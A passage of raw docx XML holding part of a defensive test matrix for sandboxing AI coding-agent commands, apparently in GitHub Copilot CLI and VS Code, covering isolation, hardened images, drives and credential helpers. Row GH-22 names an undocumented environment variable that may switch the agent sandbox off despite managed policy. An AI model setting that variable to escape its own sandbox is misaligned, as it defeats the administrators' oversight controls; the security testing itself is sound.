            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Alert doesn't block chat; confirmation names target host; cert subject "CN=GitHub Copilot credential proxy" in LocalMachine Root. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Linux/WSL install not supported</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Integrated Browser isolation</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId12" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">vscode#339644</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">User opens a page; another session opens a page; current session lists pages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Session sees </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">only its own</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> pages; domain in allow + deny → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">denied</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Browser unrestricted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Dev Container sessions</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId13" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">vscode#340696</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Agents window → Use Dev Container → Sandboxing in Dev Container; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ls ~</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> on/off</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Nested sandbox; sandboxed home listing </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">much shorter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Full listing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Corporate-hardened image</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId14" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">vscode#338112</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Standard corp build with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">WDAC, AppLocker, Defender ASR</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; run </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">node --version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍 Same engine — test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Known report: every command exits </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">0xC0000022</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> with no output</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Repo on D:, Dev Drive (ReFS) or VHDX</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId15" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">cli#5207</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:hyperlink r:id="rId16" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">cli#3712</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Open repo on non-C: drive / Dev Drive; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">git status</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">dir</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Known: "Access is denied" / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">backend_error</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; shell starts in System32. Workaround: repo on </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">C: NTFS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍 Same engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Shell starts in the workspace</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId17" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">vscode#313938</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:hyperlink r:id="rId18" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">cli#4524</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">pwd</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Get-Location</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, then </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">git status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Workspace root (regressions seen: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">C:\</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, temp dir)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Fresh login before policy resolves</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId19" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">cli#4522</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">New profile, user </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">enabled: false</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, no managed key; first </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">-p</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> command before token lookup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Provisional fail-closed floor sandboxes the command; session must </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">recover</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> once policy resolves 🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Should run unsandboxed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Undocumented override env var</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId20" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">cli#4853</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Managed </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">enabled + failIfUnavailable</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; launch with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">COPILOT_CLI_SANDBOX_SUPPORT_OVERRIDE=unsupported</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Must still fail closed</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> — if it runs unsandboxed, raise P1 with GitHub and add EDR detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍 Agent Host bundles the CLI runtime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Runs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Nested / outer sandbox</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (cli#4853)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Run inside a container that denies </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">unshare</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">setns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Clear error (pre-1.0.87: silent hang)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Sandbox OFF really off</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId21" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">cli#4679</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">No managed key, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">enabled: false</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; run any command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Runs directly — known bug: BaseContainer still initialised, WRITE_DAC error</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Non-GitHub git remotes / other identity</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId22" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">cli#5102</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Repo with own </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">credential.helper</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (Azure Repos, Bitbucket, fine-grained PAT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Known: sandbox injects empty helper override → "unable to get password" (≥ 1.0.92)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Kerberos / Negotiate proxy</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId23" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">cli#5142</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Remote HTTP MCP through corp proxy needing NTLM/Negotiate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
